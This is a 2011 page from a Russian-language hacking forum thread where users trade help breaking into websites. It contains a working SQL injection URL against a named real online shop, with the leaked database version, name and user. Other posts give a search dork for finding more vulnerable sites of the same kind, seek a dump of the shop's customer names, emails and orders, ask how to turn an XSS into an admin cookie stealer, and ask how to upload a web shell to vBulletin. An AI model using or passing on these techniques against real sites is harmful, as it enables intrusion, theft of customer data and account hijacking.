HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1819 из 2438 « Первая < 8191319171917691809 1815 1816 1817 1818 1819 1820 1821 1822 1823 1829186919192319 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #18181  
Старый 24.09.2011, 23:43
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от Codeblo  
Codeblo said:
Сообственно Для Профи:
Есть вот это:
Выдает вот это:
]
Как мне сообщил уважаемый, ник называть не буду.
длина кейворда превышает максимум
но почему то синтакс еррор выдает
Сообственно интересует Можно ли как то раскрутить и похекать это шоп?
PS: За реальную помощь, 300Z в Пм или icq, если получится раскрутить. Я просто не знаю что с ним делать.
Похекать шоп не получится, так как стоит 4 ветка MySQL.

Цитата:
Сообщение от None  
http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+
4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
 
Ответить с цитированием

  #18182  
Старый 25.09.2011, 00:07
~{OmRus}~
Guest
Сообщений: n/a
Провел на форуме:
8471

Репутация: 1
По умолчанию
При регистрации в поле вопрос я ввел ">alert(/XSS/) потом взял поле востановить пароль ввел свой логин и код с картинки, потом меня переадресовует на страницу с вопросом и тогда высвечиваеться /XSS/

Вопрос: как сделать из этого снифер? И пожалуйста скажите когда я кину ссылку админу и он не будет авторизован на сайте то его куки не крадуться?(То есть нужно чтобы он был авторизован на сайте?)
 
Ответить с цитированием

  #18183  
Старый 25.09.2011, 01:11
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию
проблемка есть....соснифал куки админа, меняю куки на его... рефрешу линку на админку... ноль эмоций. недоступен урл.

может быть привязка к ip? есть еще варианты?
 
Ответить с цитированием

  #18184  
Старый 25.09.2011, 01:12
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
Похекать шоп не получится, так как стоит 4 ветка MySQL.
4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
нет доступа к inf. schema - не значит, что похекать не получится.
 
Ответить с цитированием

  #18185  
Старый 25.09.2011, 05:14
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
Похекать шоп не получится, так как стоит 4 ветка MySQL.
Всё получиться

То что стоит что четвёртая версия, это значит что только невозможно узнать названия таблиц.

Префикс таблиц: 'theqice_'

Дорк:

Код:
Code:
inurl:"prodisp.php?prodcatind"
Почти везде есть SQL-inj. Получаем доступ к одному из сайтов. Узнаём CMS/Названия таблиц. Ну а потом(Чисто теоретически) почти всех в этом списке, в том числе и ваш сайт можно похекать.
 
Ответить с цитированием

  #18186  
Старый 25.09.2011, 12:40
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию
а не проще поставить такой двиг себе на машину?)
 
Ответить с цитированием

  #18187  
Старый 25.09.2011, 12:47
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию
Цитата:
Сообщение от Codeblo  
Codeblo said:
Сообственно Для Профи:
Есть вот это:
Выдает вот это:
]
Как мне сообщил уважаемый, ник называть не буду.
длина кейворда превышает максимум
но почему то синтакс еррор выдает
Сообственно интересует Можно ли как то раскрутить и похекать это шоп?
PS: За реальную помощь, 300Z в Пм или icq, если получится раскрутить. Я просто не знаю что с ним делать.
вынужден вас огорчить - колонка с номер карты зашифрована, и судя по длине, обратно расшифровать не получится
 
Ответить с цитированием

  #18188  
Старый 25.09.2011, 15:15
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию
Цитата:
Сообщение от Codeblo  
Codeblo said:
Интересует вопрос о Номером карты какой вы имеете в виду? Если вы про сс Карты то мне с Сайта не нужны не карты -не пароли юзеров, мне нужен дамп юзеров , фио мыло товары суммы и т.д Если вы конечно про это имели ввиду.
скинул названия таблиц + колонок в ПМ
 
Ответить с цитированием

  #18189  
Старый 26.09.2011, 00:21
~{OmRus}~
Guest
Сообщений: n/a
Провел на форуме:
8471

Репутация: 1
По умолчанию
Как залить шел в vBulletin 4.0.3 если есть доступ к админке?

Вот таблицы в admincp





Что нажимать? просто я нап первый раз заливаю шел
 
Ответить с цитированием

  #18190  
Старый 26.09.2011, 00:37
vasykas
Guest
Сообщений: n/a
Провел на форуме:
173402

Репутация: 37
По умолчанию
Цитата:
Сообщение от ~{OmRus}~  
~{OmRus}~ said:
Как залить шел в
vBulletin


/thread22852.html
 
Ответить с цитированием
Ответ
Страница 1819 из 2438 « Первая < 8191319171917691809 1815 1816 1817 1818 1819 1820 1821 1822 1823 1829186919192319 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ